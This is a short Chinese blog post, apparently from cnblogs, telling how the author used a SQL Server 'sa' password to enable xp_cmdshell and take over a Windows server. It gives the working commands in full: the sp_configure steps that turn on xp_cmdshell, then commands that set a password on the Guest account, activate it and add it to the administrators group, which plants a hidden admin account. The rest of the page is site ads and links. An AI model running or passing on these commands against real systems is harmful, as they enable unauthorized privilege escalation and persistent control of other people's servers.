一次利用MSSQL的SA账户提权获取服务器权限
遇到小人,把服务器整走了
自己手里只有sql server的sa账号密码
模糊记起之前用这个账户提权读取文件的事
百度之,发现相关信息一堆堆
各种工具也用了不少 发现不是语法错误就是权限不够
无奈之下装了sql server r2直接来操作
顺利连接上去,看到有master这个库。
直奔重点去
这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它
尝试用正常的方法打开xp_cmdshell:
1 2 3 4 5 | EXEC sp_configure 'show advanced options' , 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell' , 1; RECONFIGURE; exec sp_configure |
看来运气还是不错滴,xp_cmdshell顺利打开了。然后就可以直接执行cmd命令了:
exec xp_cmdshell ' net user Guest Qwer123456789' exec xp_cmdshell ' net user Guest /active:yes' exec xp_cmdshell 'net localgroup administrators Guest /add'
算是顺利
没什么障碍
最后附上一张远程登录的截图
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
· 现代计算机视觉入门之:什么是图片特征编码
· 手把手教你在本地部署DeepSeek R1,搭建web-ui ,建议收藏!
· Spring AI + Ollama 实现 deepseek-r1 的API服务和调用
· 数据库服务器 SQL Server 版本升级公告
· 程序员常用高效实用工具推荐,办公效率提升利器!
· C#/.NET/.NET Core技术前沿周刊 | 第 23 期(2025年1.20-1.26)